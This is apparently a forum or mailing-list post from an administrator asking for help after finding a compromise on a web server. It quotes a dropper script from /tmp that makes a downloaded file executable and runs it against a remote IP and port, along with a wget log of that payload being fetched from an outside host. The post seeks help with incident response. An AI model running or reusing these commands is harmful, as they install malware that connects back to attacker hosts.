Hi all, I have found something under /tmp: .do .do.sh --> ---- chmod 755 /tmp/.do /tmp/.do 163.17.51.8 9090 ----- ls -l shows: wwwrun nogroup ---- I have found in /var/log/httpd/error.log --09:06:43-- http://218.234.171.84/manual/.x/rhs => `/tmp/.do' Resolving 218.234.171.84... done. Connecting to 218.234.171.84:80... connected. HTTP request sent, awaiting response... 200 OK Length: 435,444 [text/plain] 0K .......... .......... .......... .......... .......... 11% 44.21 KB/s 50K .......... .......... .......... .......... .......... 23% 131.93 KB/s 100K .......... .......... .......... .......... .......... 35% 123.76 KB/s 150K .......... .......... .......... .......... .......... 47% 153.37 KB/s 200K .......... .......... .......... .......... .......... 58% 137.36 KB/s 250K .......... .......... .......... .......... .......... 70% 150.15 KB/s 300K .......... .......... .......... .......... .......... 82% 373.13 KB/s 350K .......... .......... .......... .......... .......... 94% 144.09 KB/s 400K .......... .......... ..... 100% 90.46 KB/s 09:06:47 (115.02 KB/s) - `/tmp/.do' saved [435444/435444] connect error ----- What's that? chkroot shows nothing, tripwire -"- ??? Gruss Tibor